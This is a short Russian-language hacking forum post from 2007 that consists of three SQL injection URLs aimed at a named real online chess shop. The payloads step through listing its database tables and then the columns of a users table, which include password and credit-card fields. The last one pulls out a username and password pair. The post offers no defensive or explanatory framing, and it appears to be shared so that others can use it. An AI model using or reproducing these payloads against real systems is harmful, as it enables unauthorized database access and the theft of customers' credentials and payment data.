Показать сообщение отдельно

  #2  
Старый 17.07.2007, 20:49
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

shop
Цитата:
http://www.chessbase.com/shop/product.asp?pid=1+or+1=(SELECT+TOP+1+TABLE_NAME+FR OM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+ IN+('nachrichten','acpplayers','bundesligaspieler' ,'cbuser','dailychess','dedownload','deevent','des upport','deutschmann_pw','deutschmann_shop','downl oad_e','dtproperties','elturco','esnews','events_e ','lapista','news','pictureup','products','product s_es','servernews_es','shopd','spotlight','support ','support_e','sysconstraints','syssegments','trai ning','turnierraum','usdollar','users'))--
Цитата:
http://www.chessbase.com/shop/product.asp?pid=1+or+1=(SELECT+TOP+1+COLUMN_NAME+F ROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='u sers'+AND+COLUMN_NAME+NOT+IN+('user_id','user_user name','user_password','user_email','user_street',' user_city','user_state','user_zip','user_ccnumber' ,'user_cctype','user_ccexpires','user_ccname'))--
Цитата:
http://www.chessbase.com/shop/product.asp?pid=1+or+1=(SELECT+TOP+1+cast(user_use rname+as+nvarchar)%2B%27%3A%27%2Bcast(user_passwor d+as+nvarchar)+from+users+where+user_id=1)--
 
Ответить с цитированием